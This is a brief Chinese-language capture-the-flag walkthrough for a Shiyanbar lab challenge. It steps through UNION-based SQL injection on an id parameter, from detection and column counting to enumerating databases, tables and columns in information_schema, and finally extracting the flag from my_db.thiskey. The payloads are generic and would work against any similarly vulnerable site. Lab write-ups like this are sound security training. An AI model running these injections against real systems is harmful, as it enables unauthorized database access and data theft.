CTF 实验吧 这个看起来有点简单
打开之后长这样,看到网址连接有id=1,想到可能是sql注入
输入2
有变化!看来是sql注入
输入1’
报错?报错就对了
输入id=1 and 1=1 和 id=1 and 1=2
嗯,没错了,肯定是sql注入
输入id=1 union select 1,2
判断有两列!爆数据库名
输入id=1 union select 1,schema_name from information_schema.schemata
获得三个数据库名称,感觉第二个有点可疑,爆表名
输入id=1 union select 1,table_name from information_schema.tables where table_schema=‘my_db’
看到了thiskey,估计没错了下一个就是字段名
输入id=1 union select 1,column_name from information_schema.columns where table_name=‘thiskey’
好了k0y肯定是了,爆内容吧
输入id=1 union select 1,k0y from my_db.thiskey
gotit
提交收工